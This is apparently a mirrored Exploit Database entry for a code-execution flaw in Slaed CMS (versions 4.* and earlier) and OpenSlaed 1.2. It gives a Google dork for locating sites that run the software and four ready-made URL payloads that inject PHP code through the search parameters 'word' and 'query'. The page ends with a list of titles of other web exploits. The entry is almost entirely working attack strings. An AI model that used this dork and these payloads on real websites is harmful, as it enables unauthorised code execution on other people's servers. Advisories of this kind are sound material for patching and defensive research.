Slaed CMS – Code Execution

Exploit Database
13 阅读

作者： brain[pillow]

日期： 2011-09-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17824/

# Exploit Title: Slaed CMS Code exec
# Google Dork: "Powered by SLAED CMS"
# Date: 03.05.2011
# Author: brain[pillow]
# Software Link: http://slaed.net/
# Version: OpenSlaed 1.2 (free), Slaed CMS <= 4.*

On different versions of this software next vulnerabilities are availible:

/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view
/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view

OR:

/search.html?mod=&word={${phpinfo()}}&query=ok&to=view
/search.html?mod=&word=ok&query={${phpinfo()}}&to=view

last Exploits
Slaed CMS – Code Execution的更多信息

Exam Form Submission System 1.0 – SQL Injection Authentication Bypass：
Joomla! Component com_incapsula – Multiple Cross-Site Scripting Vulnerabilities：
2DayBiz B2B Portal Script – SQL Injection：
Lyrics Script – SQL Injection / Cross-Site Scripting：
Pixie 1.0.4 – Arbitrary File Upload：
Supernews 2.6.1 – ‘noticias.php?cat’ SQL Injection：
Prestashop 1.4.4.1 – ‘displayImage.php’ HTTP Response Splitting：
SIPve 0.0.2-R19 – SQL Injection：